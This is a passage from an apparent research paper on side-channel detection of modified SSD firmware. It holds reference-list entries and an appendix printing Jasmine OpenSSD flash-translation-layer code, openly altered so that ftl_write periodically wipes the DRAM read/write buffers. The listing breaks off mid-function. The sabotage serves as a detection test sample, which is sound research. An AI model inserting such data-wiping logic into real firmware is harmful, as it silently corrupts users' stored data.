[21] Mostafa Bazzaz, Mohammad Salehi, and Alireza Ejlali. An accurate instruction-level energy estimation model and tool for embedded systems. IEEE Transactions on Instrumentation and Measurement, 62(7):1927–1934, 2013.

[22] Martijn Bogaard and Yonne de Bruijn. The evil SSD project: When your storage has a mind of its own. 2015.

[23] Rodrigo Branco and Shay Gueron. Blinded random corruption attacks. In 2016 IEEE International Symposium on Hardware Oriented Security and Trust (HOST), pages 85–90. IEEE, 2016.

[24] Dane Brown, Owens Walker, Ryan Rakvic, Robert W. Ives, Hau Ngo, James Shey, and Justin Blanco. Towards detection of modified firmware on solid state drives via side channel analysis. In Proceedings of the International Symposium on Memory Systems, MEMSYS '18, pages 315–320, New York, NY, USA, 2018. ACM. ISBN 978-1-4503-6475-1. doi: 10.1145/3240302.3285860. URL http://doi.acm.org/10.1145/3240302.3285860.

[25] Erik Buchanan, Ryan Roemer, Hovav Shacham, and Stefan Savage. When good instructions go bad: Generalizing return-oriented programming to RISC. In Proceedings of the 15th ACM conference on Computer and communications security, pages 27–38. ACM, 2008.

[26] Bulba and Kil3r. Bypassing StackGuard and StackShield. Phrack Magazine, 56, 2000.

[27] JonPaul Canclini, James McMasters, James Shey, Owens Walker, Ryan Rakvic, Hau Ngo, and Kevin D Fairbanks. Inferring read and write operations of solid-state drives based on energy consumption. In Ubiquitous Computing, Electronics & Mobile Communication Conference (UEMCON), IEEE Annual, pages 1–6. IEEE, 2016.

[28] Yuan-Hao Chang, Jen-Wei Hsieh, and Tei-Wei Kuo. Endurance enhancement of flash-memory storage systems: An efficient static wear leveling design. In Design Automation Conference, 2007. DAC'07. 44th ACM/IEEE, pages 212–217. IEEE, 2007.

[29] Stephen Checkoway, Ariel J Feldman, Brian Kantor, J Alex Halderman, Edward W Felten, and Hovav Shacham. Can DREs provide long-lasting security? The case of return-oriented programming and the AVC Advantage. In EVT/WOTE, 2009.

[30] Stephen Checkoway, Lucas Davi, Alexandra Dmitrienko, Ahmad-Reza Sadeghi, Hovav Shacham, and Marcel Winandy. Return-oriented programming without returns. In Proceedings of the 17th ACM conference on Computer and communications security, pages 559–572. ACM, 2010.

[31] Feng Chen, David A Koufaty, and Xiaodong Zhang. Understanding intrinsic characteristics and system implications of flash memory based solid state drives. In ACM SIGMETRICS Performance Evaluation Review, volume 37, pages 181–192. ACM, 2009.

[32] Yueqiang Cheng, Zongwei Zhou, Yu Miao, Xuhua Ding, Huijie Deng, et al. ROPecker: A generic and practical approach for defending against ROP attack. 2014.

[33] Mei-Ling Chiang, Paul CH Lee, and Ruei-Chuan Chang. Using data clustering to improve cleaning performance for flash memory. Software: Practice and Experience, 29(3):267–290, 1999.

[34] William Hohl and Christopher Hinds. ARM Assembly Language: Fundamentals and Techniques. CRC Press, 2nd edition, 2014. ISBN 978-1482229851.

[35] Hyunmo Chung. Introduction to Barefoot. OpenSSD Workshop, South Korea, 2011.

[36] Shane S Clark, Benjamin Ransford, Amir Rahmati, Shane Guineau, Jacob Sorber, Wenyuan Xu, Kevin Fu, A Rahmati, M Salajegheh, D Holcomb, et al. WattsUpDoc: Power side channels to nonintrusively discover untargeted malware on embedded medical devices. In HealthTech, 2013.

[37] Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti. A large-scale analysis of the security of embedded firmwares. In Proceedings of the 23rd USENIX Conference on Security Symposium, SEC'14, pages 95–110, Berkeley, CA, USA, 2014. USENIX Association. ISBN 978-1-931971-15-7. URL http://dl.acm.org/citation.cfm?id=2671225.2671232.

[38] Crispan Cowan, Calton Pu, Dave Maier, Jonathan Walpole, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle, Qian Zhang, and Heather Hinton. StackGuard: Automatic adaptive detection and prevention of buffer-overflow attacks. In Usenix Security, volume 98, pages 63–78, 1998.

[39] Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle, and Erik Walthinsen. Protecting systems from stack smashing attacks with StackGuard. In Linux Expo, 1999.

[40] Crispin Cowan, F Wagle, Calton Pu, Steve Beattie, and Jonathan Walpole. Buffer overflows: Attacks and defenses for the vulnerability of the decade. In DARPA Information Survivability Conference and Exposition, 2000. DISCEX'00. Proceedings, volume 2, pages 119–129. IEEE, 2000.

[41] Filipe Augusto da Luz Lemos, Rubens Alexandre de Faria, Paulo Jose Abatti, Mauro Sergio Pereira Fonseca, and Keiko Veronica Ono Fonseca. Memory auditing for detection of compromised switches in software-defined networks using trusted execution environment. In Developments and Advances in Defense and Security, pages 77–85. Springer, 2020.

[42] Rachna Dhamija, J Doug Tygar, and Marti Hearst. Why phishing works. In Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, pages 581–590. ACM, 2006.

[43] J Domburg. Hard disk hacking. SpritesMods.com, 2013. URL http://spritesmods.com/?art=hddhack.

[44] Pavel Mikhailovich Dovgalyuk and Vladimir Alekseyevich Makarov. When stack protection does not protect the stack? Trudy instituta sistemnogo programmirovaniya RAN, 28(5):55–72, 2016.

[45] Amitai Etzioni. Cyber trust. Journal of Business Ethics, 156(1):1–13, 2019.

[46] Aurélien Francillon and Claude Castelluccia. Code injection attacks on Harvard-architecture devices. In Proceedings of the 15th ACM conference on Computer and communications security, pages 15–26. ACM, 2008.

[47] Ivan Fratrić. ROPGuard: Runtime prevention of return-oriented programming attacks, 2012.

[48] Jack Ganssle. The shape of the MCU market, March 2016. URL https://www.embedded.com/electronics-blogs/break-points/4441588/The-shape-of-the-MCU-market.

[49] Carlos Aguayo Gonzalez and Alan Hinton. Detecting malicious software execution in programmable logic controllers using power fingerprinting. In International Conference on Critical Infrastructure Protection, pages 15–27. Springer, 2014.

[50] Trevor Hastie, Robert Tibshirani, and Jerome Friedman. The Elements of Statistical Learning: Data Mining, Inference, and Prediction. Springer Science & Business Media, 2009.

[51] Jarilyn Hernandez Jimenez and Katerina Goseva-Popstojanova. Malware detection using power consumption and network traffic data. In 2nd International Conference on Data Intelligence and Security, July 2019. doi: 10.1109/ICDIS.2019.00016.

[52] Andrei Homescu, Michael Stewart, Per Larsen, Stefan Brunthaler, and Michael Franz. Microgadgets: Size does matter in Turing-complete return-oriented programming. In Proceedings of the 6th USENIX conference on Offensive Technologies, pages 7–7. USENIX Association, 2012.

[53] Mark Hung. Leading the IoT: Gartner insights on how to lead in a connected world. Gartner Research, pages 1–29, 2017.

[54] J. Stewart and V. Dedhia. ROP compiler. http://www.keil.com/support/man/docs/uv4/uv4_debugging.htm. Accessed: 2018-04-14.

[55] Athanasios Karakasiliotis, SM Furnell, and Maria Papadaki. An assessment of end-user vulnerability to phishing attacks. Journal of Information Warfare, 6(1):17–28, 2007.

[56] Atsuo Kawaguchi, Shingo Nishioka, and Hiroshi Motoda. A flash-memory based file system. In USENIX, pages 155–164, 1995.

[57] Tim Kornau. Return oriented programming for the ARM architecture. Master's thesis, Ruhr-Universität Bochum, 2010.

[58] Jason Kulick, Tian Lu, Carlos Ortega, Rob Engelhardt, Yiyu Shi, Gary H Bernstein, and John Timler. Enhancing PCB hardware security through randomized encoding of logic on hybrid quilt-packaged IC-PCB system. Technical report, Indiana Integrated Circuits, LLC, South Bend, United States, 2019.

[59] David Kushner. The real story of Stuxnet. IEEE Spectrum, 50(3):48–53, 2013.

[60] Michael Lackner, Reinhard Berlach, Reinhold Weiss, and Christian Steger. Countering type confusion and buffer overflow attacks on Java smart cards by data type sensitive obfuscation. In Proceedings of the First Workshop on Cryptography and Security in Computing Systems, pages 19–24. ACM, 2014.

[61] Ralph Langner. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy, 9(3):49–51, 2011.

[62] Adrian P Lauf, Richard A Peters, and William H Robinson. A distributed intrusion detection system for resource-constrained devices in ad-hoc networks. Ad Hoc Networks, 8(3):253–266, 2010.

[63] Long Le. ARM exploitation ROPmap. In BlackHat 2011 Briefings and Training. BlackHat, 2011.

[64] Sang-Won Lee, Dong-Joo Park, Tae-Sun Chung, Dong-Ho Lee, Sangwon Park, and Ha-Joo Song. A log buffer-based flash translation layer using fully-associative sector translation. ACM Transactions on Embedded Computing Systems (TECS), 6(3):18, 2007.

[65] Sang-Phil Lim, Sang-Won Lee, and Bongki Moon. Faster FTL for enterprise-class flash memory SSDs. In Storage Network Architecture and Parallel I/Os (SNAPI), 2010 International Workshop on, pages 3–12. IEEE, 2010.

[66] Sangphil Lim. The Jasmine OpenSSD Platform: Technical Reference Manual. VLDB Lab, South Korea, January 2012. http://www.openssd-project.org.

[67] Nathan Manworren, Joshua Letwat, and Olivia Daily. Why you should care about the Target data breach. Business Horizons, 59(3):257–266, 2016.

[68] Luke Mather, Elisabeth Oswald, Joe Bandenburg, and Marcin Wójcik. Does my device leak information? an a priori statistical power analysis of leakage detection tests. In International Conference on the Theory and Application of Cryptology and Information Security, pages 486–505. Springer, 2013.

[69] John McDonald. Defeating Solaris/SPARC non-executable stack protection. Bugtraq, March 1999.

[70] Carlo Meijer and Bernard van Gastel. Self-encrypting deception: Weaknesses in the encryption of solid state drives. In 40th IEEE Symposium on Security and Privacy, San Francisco, CA, May 20-22, 2019.

[71] Jacob Melton, Ryan Rakvic, James Shey, Hau Ngo, Owens Walker, Justin Blanco, Dane Brown, Luke McDowell, and Kevin D Fairbanks. Inferring file system of solid state drives based on current consumption. In 2017 IEEE 7th Annual International Conference on CYBER Technology in Automation, Control, and Intelligent Systems (CYBER), pages 72–76. IEEE, 2017.

[72] Aleph One. Smashing the stack for fun and profit. Phrack, 7(49), 1996.

[73] Vasilis Pappas. kBouncer: Efficient and transparent ROP mitigation. Technical report, 2012.

[74] Raspberry Pi: Teach, learn, and make with Raspberry Pi. https://www.raspberrypi.org, 2017. Accessed: 2017-09-13.

[75] Bruce Potter. Microsoft SDL threat modelling tool. Network Security, 2009(1):15–18, 2009.

[76] Michael Riley, Ben Elgin, Dune Lawrence, and Carol Matlack. Missed alarms and 40 million stolen credit card numbers: How Target blew it. Bloomberg Businessweek, 13, 2014.

[77] Jordan Robertson and Michael Riley. The big hack: How China used a tiny chip to infiltrate US companies. Bloomberg Businessweek, 4, 2018.

[78] John T Robinson. Analysis of steady-state segment storage utilizations in a log-structured file system with least-utilized segment cleaning. ACM SIGOPS Operating Systems Review, 30(4):29–32, 1996.

[79] Jonathan Salwan. ROPgadget. https://github.com/JonathanSalwan/ROPgadget. Accessed: 2017-04-25.

[80] Sriram Sankar, Mark Shaw, Kushagra Vaid, and Sudhanva Gurumurthi. Datacenter scale evaluation of the impact of temperature on hard disk drive failures. ACM Transactions on Storage (TOS), 9(2):6, 2013.

[81] Felix Schuster, Thomas Tendyck, Jannik Pewny, Andreas Maaß, Martin Steegmanns, Moritz Contag, and Thorsten Holz. Evaluating the effectiveness of current anti-rop defenses. In International Workshop on Recent Advances in Intrusion Detection, pages 88–108. Springer, 2014.

[82] Hovav Shacham. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In Proceedings of the 14th ACM conference on Computer and communications security, pages 552–561. ACM, 2007.

[83] James Shey, Justin A Blanco, Owens Walker, Thomas Tedesso, Hau Ngo, Ryan Rakvic, and Kevin Fairbanks. Monitoring device current to characterize trim operations of solid-state drives. IEEE Transactions on Information Forensics and Security, to be published, 2018.

[84] Yang Shi, Fangyu Li, WenZhan Song, Xiang-Yang Li, and Jin Ye. Energy audition based cyber-physical attack detection system in IoT. In Proceedings of the ACM Turing Celebration Conference - China, ACM TURC '19, pages 27:1–27:5, New York, NY, USA, 2019. ACM. ISBN 978-1-4503-7158-2. doi: 10.1145/3321408.3321588. URL http://doi.acm.org/10.1145/3321408.3321588.

[85] Adam Shostack. Threat modeling: Designing for security. John Wiley & Sons, 2014.

[86] Michael Sipser. Introduction to the Theory of Computation. International Thomson Publishing, 2nd edition, 2006. ISBN 0534950973.

[87] Andrew N. Sloss, Dominic Symes, and Chris Wright. ARM System Developer’s Guide. Elsevier, 2004. ISBN 1558608745.

[88] Tiva TM4C123GH6PM Microcontroller. Texas Instruments Incorporated, 2014. Rev. E.

[89] TivaWare™ Peripheral Driver Library. Texas Instruments Incorporated, 2016. Version 2.1.3.156.

[90] Tim Thornburgh. Social engineering: the dark art. In Proceedings of the 1st annual conference on Information security curriculum development, pages 133–135. ACM, 2004.

[91] Peter Torr. Demystifying the threat modeling process. IEEE Security & Privacy, 3(5):66–70, 2005.

[92] Frank Vahid and Tony Givargis. Embedded system design: A unified hardware/software approach. Department of Computer Science and Engineering, University of California, 1999.

[93] Xiaoxiao Wang, Hassan Salmani, Mohammad Tehranipoor, and Jim Plusquellic. Hardware trojan detection and isolation using current integration and localized current analysis. In Defect and Fault Tolerance of VLSI Systems, 2008. DFTVS'08. IEEE International Symposium on, pages 87–95. IEEE, 2008.

[94] Nathanael R Weidler, Dane Brown, Samuel A Mitchell, Joel Anderson, Jonathan R Williams, Austin Costley, Chase Kunz, Christopher Wilkinson, Remy Wehbe, and Ryan Gerdes. Return-oriented programming on a resource constrained device. Sustainable Computing: Informatics and Systems, 22:244–256, 2019.

[95] Stephen Weis. Protecting data in-use from firmware and physical attacks. In Black Hat, 2014.

[96] Peter Welch. The use of fast Fourier transform for the estimation of power spectra: A method based on time averaging over short, modified periodograms. IEEE Transactions on Audio and Electroacoustics, 15(2):70–73, 1967.

[97] Manuel Wendt, Matthias Grumer, Christian Steger, R Weiss, Ulrich Neffe, and A Muhlberger. Energy consumption measurement technique for automatic instruction set characterization of embedded processors. In Instrumentation and Measurement Technology Conference Proceedings, 2007. IMTC 2007. IEEE, pages 1–4. IEEE, 2007.

[98] Jacob Wurm, Khoa Hoang, Orlando Arias, Ahmad-Reza Sadeghi, and Yier Jin. Security analysis on consumer and industrial IoT devices. In 2016 21st Asia and South Pacific Design Automation Conference (ASP-DAC), pages 519–524. IEEE, 2016.

[99] Joseph Yiu. The Definitive Guide to ARM Cortex-M3 and Cortex-M4 Processors. Newnes, 3rd edition, 2014. ISBN 978-0124080829.

[100] Balgeun Yoo, Youjip Won, Seokhei Cho, Sooyong Kang, Jongmoo Choi, and Sungroh Yoon. SSD characterization: From energy consumption's perspective. In HotStorage, 2011.

[101] Z. Johnson, A. Varon, J. A. Blanco, R. Rakvic, J. Shey, H. Ngo, D. Brown, and O. Walker. Classifying solid state drive firmware via side-channel current draw analysis. In Proceedings of the 4th IEEE International Conference on Big Data Intelligence and Computing, August 2018.

[102] Jonas Zaddach, Anil Kurmus, Davide Balzarotti, Erik-Oliver Blass, Aurélien Francillon, Travis Goodspeed, Moitrayee Gupta, and Ioannis Koltsidas. Implementation and implications of a stealth hard-drive backdoor. In Proceedings of the 29th annual computer security applications conference, pages 279–288. ACM, 2013.

[103] Lianying Zhao and Mohammad Mannan. TEE-aided write protection against privileged data tampering. arXiv preprint arXiv:1905.10723, 2019.

Appendices

Appendix A

Modified FTL Code - Clearing DRAM

The code below is the ftl.c file from the Greedy firmware provided by the Jasmine project, modified to clear the DRAM read/write buffers with 12.5% probability after every 1000 calls to ftl_write; we call the result a Greedy-12.5% firmware. We add a global variable numWrites to track the number of calls to ftl_write, and a check within ftl_write that clears the DRAM buffers based on which bank is selected for writing.

1 // Copyright 2011 INDILINX Co., Ltd.

2 //

3 // This file is part of Jasmine.

4 //

5 // Jasmine is free software: you can redistribute it and/or modify

6 // it under the terms of the GNU General Public License as published by

7 // the Free Software Foundation, either version 3 of the License, or

8 // (at your option) any later version.

9 //

10 // Jasmine is distributed in the hope that it will be useful,

11 // but WITHOUT ANY WARRANTY; without even the implied warranty of

12 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

13 // GNU General Public License for more details.

14 //

15 // You should have received a copy of the GNU General Public License


16 // along with Jasmine. See the file COPYING.

17 // If not, see <http://www.gnu.org/licenses/>.

18 //

19 // GreedyFTL source file

20 //

21 // Author: Sang-Phil Lim (SKKU VLDB Lab.)

22 //

23 // - support POR

24 // + fixed metadata area (Misc. block/Map block)

25 // + logging entire FTL metadata when each ATA commands(idle/ready/standby) was issued

26 //

28 #include "jasmine.h"

30 // Keep track of how many writes have been performed

31 unsigned int numWrites = 0;

33 //------

34 // macro

35 //------

36 #define VC_MAX 0xCDCD

37 #define MISCBLK_VBN 0x1 // vblock #1 <- misc metadata

38 #define MAPBLKS_PER_BANK (((PAGE_MAP_BYTES / NUM_BANKS) + BYTES_PER_PAGE - 1) / BYTES_PER_PAGE)

39 #define META_BLKS_PER_BANK (1 + 1 + MAPBLKS_PER_BANK) // include block #0, misc block

41 // the number of sectors of misc. metadata info.

42 #define NUM_MISC_META_SECT ((sizeof(misc_metadata) + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR)

43 #define NUM_VCOUNT_SECT ((VBLKS_PER_BANK * sizeof(UINT16) + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR)

45 //------

46 // metadata structure

47 //------

48 typedef struct _ftl_statistics

49 {

50 UINT32 gc_cnt;

51 UINT32 page_wcount; // page write count

52 }ftl_statistics;

54 typedef struct _misc_metadata

55 {

56 UINT32 cur_write_vpn; // physical page for new write

57 UINT32 cur_miscblk_vpn; // current write vpn for logging the misc. metadata

58 UINT32 cur_mapblk_vpn[MAPBLKS_PER_BANK]; // current write vpn for logging the age mapping info.

59 UINT32 gc_vblock; // vblock number for garbage collection

60 UINT32 free_blk_cnt; // total number of free block count

61 UINT32 lpn_list_of_cur_vblock[PAGES_PER_BLK]; // logging lpn list of current write vblock for GC

62 }misc_metadata; // per bank

64 //------

65 // FTL metadata (maintain in SRAM)

66 //------

67 static misc_metadata g_misc_meta[NUM_BANKS];

68 static ftl_statistics g_ftl_statistics[NUM_BANKS];

69 static UINT32 g_bad_blk_count[NUM_BANKS];

71 // SATA read/write buffer pointer id

72 UINT32 g_ftl_read_buf_id;

73 UINT32 g_ftl_write_buf_id;

75 //------

76 // NAND layout

77 //------

78 // block #0: scan list, firmware binary image, etc.

79 // block #1: FTL misc. metadata

80 // block #2 ~ #31: page mapping table

81 // block #32: a free block for gc

82 // block #33~: user data blocks

84 //------

85 // macro functions

86 //------

87 #define is_full_all_blks(bank) (g_misc_meta[bank].free_blk_cnt == 1)

88 #define inc_full_blk_cnt(bank) (g_misc_meta[bank].free_blk_cnt--)

89 #define dec_full_blk_cnt(bank) (g_misc_meta[bank].free_blk_cnt++)

90 #define inc_mapblk_vpn(bank, mapblk_lbn) (g_misc_meta[bank].cur_mapblk_vpn[mapblk_lbn]++)

91 #define inc_miscblk_vpn(bank) (g_misc_meta[bank].cur_miscblk_vpn++)

93 // page-level striping technique (I/O parallelism)

94 #define get_num_bank(lpn) ((lpn) % NUM_BANKS)

95 #define get_bad_blk_cnt(bank) (g_bad_blk_count[bank])

96 #define get_cur_write_vpn(bank) (g_misc_meta[bank].cur_write_vpn)

97 #define set_new_write_vpn(bank, vpn) (g_misc_meta[bank].cur_write_vpn = vpn)

98 #define get_gc_vblock(bank) (g_misc_meta[bank].gc_vblock)

99 #define set_gc_vblock(bank, vblock) (g_misc_meta[bank].gc_vblock = vblock)

100 #define set_lpn(bank, page_num, lpn) (g_misc_meta[bank].lpn_list_of_cur_vblock[page_num] = lpn)

101 #define get_lpn(bank, page_num) (g_misc_meta[bank].lpn_list_of_cur_vblock[page_num])

102 #define get_miscblk_vpn(bank) (g_misc_meta[bank].cur_miscblk_vpn)

103 #define set_miscblk_vpn(bank, vpn) (g_misc_meta[bank].cur_miscblk_vpn = vpn)

104 #define get_mapblk_vpn(bank, mapblk_lbn) (g_misc_meta[bank].cur_mapblk_vpn[mapblk_lbn])

105 #define set_mapblk_vpn(bank, mapblk_lbn, vpn) (g_misc_meta[bank].cur_mapblk_vpn[mapblk_lbn] = vpn)

106 #define CHECK_LPAGE(lpn) ASSERT((lpn) < NUM_LPAGES)

107 #define CHECK_VPAGE(vpn) ASSERT((vpn) < (VBLKS_PER_BANK * PAGES_PER_BLK))

109 //------

110 // FTL internal function prototype

111 //------

112 static void format(void);

113 static void write_format_mark(void);

114 static void sanity_check(void);

115 static void load_pmap_table(void);

116 static void load_misc_metadata(void);

117 static void init_metadata_sram(void);

118 static void load_metadata(void);

119 static void logging_pmap_table(void);

120 static void logging_misc_metadata(void);

121 static void write_page(UINT32 const lpn, UINT32 const sect_offset, UINT32 const num_sectors);

122 static void set_vpn(UINT32 const lpn, UINT32 const vpn);

123 static void garbage_collection(UINT32 const bank);

124 static void set_vcount(UINT32 const bank, UINT32 const vblock, UINT32 const vcount);

125 static BOOL32 is_bad_block(UINT32 const bank, UINT32 const vblock);

126 static BOOL32 check_format_mark(void);

127 static UINT32 get_vcount(UINT32 const bank, UINT32 const vblock);

128 static UINT32 get_vpn(UINT32 const lpn);

129 static UINT32 get_vt_vblock(UINT32 const bank);

130 static UINT32 assign_new_write_vpn(UINT32 const bank);

132 static void sanity_check(void)

133 {

134 UINT32 dram_requirement = RD_BUF_BYTES + WR_BUF_BYTES + COPY_BUF_BYTES + FTL_BUF_BYTES

135 + HIL_BUF_BYTES + TEMP_BUF_BYTES + BAD_BLK_BMP_BYTES + PAGE_MAP_BYTES + VCOUNT_BYTES;

137 if ((dram_requirement > DRAM_SIZE) || // DRAM metadata size check

138 (sizeof(misc_metadata) > BYTES_PER_PAGE)) // misc metadata size check

139 {

140 led_blink();

141 while (1);

142 }

143 }

144 static void build_bad_blk_list(void)

145 {

146 UINT32 bank, num_entries, result, vblk_offset;

147 scan_list_t* scan_list = (scan_list_t*) TEMP_BUF_ADDR;

149 mem_set_dram(BAD_BLK_BMP_ADDR, NULL, BAD_BLK_BMP_BYTES);

151 disable_irq();

153 flash_clear_irq();

155 for (bank = 0; bank < NUM_BANKS; bank++)

156 {

157 SETREG(FCP_CMD,FC_COL_ROW_READ_OUT);

158 SETREG(FCP_BANK, REAL_BANK(bank));

159 SETREG(FCP_OPTION,FO_E);

160 SETREG(FCP_DMA_ADDR, (UINT32) scan_list);

161 SETREG(FCP_DMA_CNT,SCAN_LIST_SIZE);

162 SETREG(FCP_COL, 0);

163 SETREG(FCP_ROW_L(bank), SCAN_LIST_PAGE_OFFSET);

164 SETREG(FCP_ROW_H(bank), SCAN_LIST_PAGE_OFFSET);

166 SETREG(FCP_ISSUE,NULL);

167 while ((GETREG(WR_STAT) & 0x00000001) != 0);

168 while (BSP_FSM(bank) != BANK_IDLE);

170 num_entries = NULL;

171 result = OK;

173 if (BSP_INTR(bank) & FIRQ_DATA_CORRUPT)

174 {

175 result = FAIL;

176 }

177 else

178 {

179 UINT32 i;

181 num_entries = read_dram_16(&(scan_list->num_entries));

183 if (num_entries > SCAN_LIST_ITEMS)

184 {

185 result = FAIL;

186 }

187 else

188 {

189 for (i = 0; i < num_entries; i++)

190 {

191 UINT16 entry = read_dram_16(scan_list->list + i);

192 UINT16 pblk_offset = entry & 0x7FFF;

194 if (pblk_offset == 0 || pblk_offset >= PBLKS_PER_BANK)

195 {

196 #if OPTION_REDUCED_CAPACITY == FALSE

197 result = FAIL;

198 #endif

199 }

200 else

201 {

202 write_dram_16(scan_list->list + i, pblk_offset);

203 }

204 }

205 }

206 }

208 if (result == FAIL)

209 {

210 num_entries = 0; // We cannot trust this scan list. Perhaps a software bug.

211 }

212 else

213 {

214 write_dram_16(&(scan_list->num_entries), 0);

215 }

217 g_bad_blk_count[bank] = 0;

219 for (vblk_offset = 1; vblk_offset < VBLKS_PER_BANK; vblk_offset++)

220 {

221 BOOL32 bad = FALSE;

223 #if OPTION_2_PLANE

224 {

225 UINT32 pblk_offset;

227 pblk_offset = vblk_offset * NUM_PLANES;

229 // fix bug@jasmine v.1.1.0

230 if (mem_search_equ_dram(scan_list, sizeof(UINT16), num_entries + 1, pblk_offset) < num_entries + 1)

231 {

232 bad = TRUE;

233 }

235 pblk_offset = vblk_offset * NUM_PLANES + 1;

237 // fix bug@jasmine v.1.1.0

238 if (mem_search_equ_dram(scan_list, sizeof(UINT16), num_entries + 1, pblk_offset) < num_entries + 1)

239 {

240 bad = TRUE;

241 }

242 }

243 #else

244 {

245 // fix bug@jasmine v.1.1.0

246 if (mem_search_equ_dram(scan_list, sizeof(UINT16), num_entries + 1, vblk_offset) < num_entries + 1)

247 {

248 bad = TRUE;

249 }

250 }

251 #endif

253 if (bad)

254 {

255 g_bad_blk_count[bank]++;

256 set_bit_dram(BAD_BLK_BMP_ADDR + bank*(VBLKS_PER_BANK/8 + 1), vblk_offset);

257 }

258 }

259 }

260 }

262 void ftl_open(void)

263 {

264 // debugging example 1 - use breakpoint statement!

265 /* *(UINT32*)0xFFFFFFFE = 10; */

267 /* UINT32 volatile g_break = 0; */

268 /* while (g_break == 0); */

270 led(0);

271 sanity_check();

272 //------

273 // read scan lists from NAND flash

274 // and build bitmap of bad blocks

275 //------

276 build_bad_blk_list();

278 //------

279 // If necessary, do low-level format

280 // format() should be called after loading scan lists, because format() calls is_bad_block().

281 //------

282 /* if (check_format_mark() == FALSE) */

283 if (TRUE)

284 {

285 uart_print("do format");

286 format();

287 uart_print("end format");

288 }

289 // load FTL metadata

290 else

291 {

292 load_metadata();

293 }

294 g_ftl_read_buf_id = 0;

295 g_ftl_write_buf_id = 0;

297 // This example FTL can handle runtime bad block interrupts and read fail (uncorrectable bit errors) interrupts

298 flash_clear_irq();

300 SETREG(INTR_MASK, FIRQ_DATA_CORRUPT | FIRQ_BADBLK_L | FIRQ_BADBLK_H);

301 SETREG(FCONF_PAUSE, FIRQ_DATA_CORRUPT | FIRQ_BADBLK_L | FIRQ_BADBLK_H);

303 enable_irq();

304 }

305 void ftl_flush(void)

306 {

307 /* ptimer_start(); */

308 logging_pmap_table();

309 logging_misc_metadata();

310 /* ptimer_stop_and_uart_print(); */

311 }

312 // Testing FTL protocol APIs

313 void ftl_test_write(UINT32 const lba, UINT32 const num_sectors)

314 {

315 ASSERT(lba + num_sectors <= NUM_LSECTORS);

316 ASSERT(num_sectors > 0);

318 ftl_write(lba, num_sectors);

319 }

320 void ftl_read(UINT32 const lba, UINT32 const num_sectors)

321 {

322 UINT32 remain_sects, num_sectors_to_read;

323 UINT32 lpn, sect_offset;

324 UINT32 bank, vpn;

326 lpn = lba / SECTORS_PER_PAGE;

327 sect_offset = lba % SECTORS_PER_PAGE;

328 remain_sects = num_sectors;

330 while (remain_sects != 0)

331 {

332 if ((sect_offset + remain_sects) < SECTORS_PER_PAGE)

333 {

334 num_sectors_to_read = remain_sects;

335 }

336 else

337 {

338 num_sectors_to_read = SECTORS_PER_PAGE - sect_offset;

339 }

340 bank = get_num_bank(lpn); // page striping

341 vpn = get_vpn(lpn);

342 CHECK_VPAGE(vpn);

344 if (vpn != NULL)

345 {

346 nand_page_ptread_to_host(bank,

347 vpn / PAGES_PER_BLK,

348 vpn % PAGES_PER_BLK,

349 sect_offset,

350 num_sectors_to_read);

351 }

352 // The host is requesting to read a logical page that has never been written to.

353 else

354 {

355 UINT32 next_read_buf_id = (g_ftl_read_buf_id + 1) % NUM_RD_BUFFERS;

357 #if OPTION_FTL_TEST == 0

358 while (next_read_buf_id == GETREG(SATA_RBUF_PTR)); // wait if the read buffer is full (slow host)

359 #endif

361 // fix bug @ v.1.0.6

362 // Send 0xFF...FF to host when the host request to read the sector that has never been written.

363 // In old version, for example, if the host request to read unwritten sector 0 after programming in sector 1, Jasmine would send 0x00...00 to host.

364 // However, if the host already wrote to sector 1, Jasmine would send 0xFF...FF to host when host request to read sector 0. ( ftl_read() in ftl_xxx/ftl.c)

365 mem_set_dram(RD_BUF_PTR(g_ftl_read_buf_id) + sect_offset* BYTES_PER_SECTOR,

366 0xFFFFFFFF, num_sectors_to_read*BYTES_PER_SECTOR);

368 flash_finish();

370 SETREG(BM_STACK_RDSET, next_read_buf_id); // change bm_read_limit

371 SETREG(BM_STACK_RESET, 0x02); // change bm_read_limit

373 g_ftl_read_buf_id = next_read_buf_id;

374 }

375 sect_offset = 0;

376 remain_sects -= num_sectors_to_read;

377 lpn++;

378 }

379 }

380 void ftl_write(UINT32 const lba, UINT32 const num_sectors)

381 {

382 numWrites++; // Increment the write counter

383 UINT32 bank; //, vblock, vcount_val;

385 UINT32 remain_sects, num_sectors_to_write;

386 UINT32 lpn, sect_offset;

388 lpn = lba / SECTORS_PER_PAGE;

389 sect_offset = lba % SECTORS_PER_PAGE;

390 remain_sects = num_sectors;

392 // After every 1000 writes, clear the DRAM buffers if bank 0 is selected (12.5% probability)

393 if (numWrites%1000 == 0)

394 {

395 bank = get_num_bank(lpn); // page striping

396 if (bank < 1) // 12.5% of the banks

397 {

398 // uart_printf("Clearing DRAM write buffer...\n");

399 //------

400 // Nullify the Read and Write buffers in DRAM

401 //------

402 mem_set_dram(DRAM_BASE, NULL, RD_BUF_BYTES + WR_BUF_BYTES);

403 }

404 }

405 while (remain_sects != 0)

406 {

407 if ((sect_offset + remain_sects) < SECTORS_PER_PAGE)

408 {

409 num_sectors_to_write = remain_sects;

410 }

411 else

412 {

413 num_sectors_to_write = SECTORS_PER_PAGE - sect_offset;

414 }

415 // single page write individually

416 write_page(lpn, sect_offset, num_sectors_to_write);

418 sect_offset = 0;

419 remain_sects -= num_sectors_to_write;

420 lpn++;

421 }

422 }

423 static void write_page(UINT32 const lpn, UINT32 const sect_offset, UINT32 const num_sectors)

424 {

425 CHECK_LPAGE(lpn);

426 ASSERT(sect_offset < SECTORS_PER_PAGE);

427 ASSERT(num_sectors > 0 && num_sectors <= SECTORS_PER_PAGE);

429 UINT32 bank, old_vpn, new_vpn;

430 UINT32 vblock, page_num, page_offset, column_cnt;

432 bank = get_num_bank(lpn); // page striping

433 page_offset = sect_offset;

434 column_cnt = num_sectors;

436 new_vpn = assign_new_write_vpn(bank);

437 old_vpn = get_vpn(lpn);

439 CHECK_VPAGE (old_vpn);

440 CHECK_VPAGE (new_vpn);

441 ASSERT(old_vpn != new_vpn);

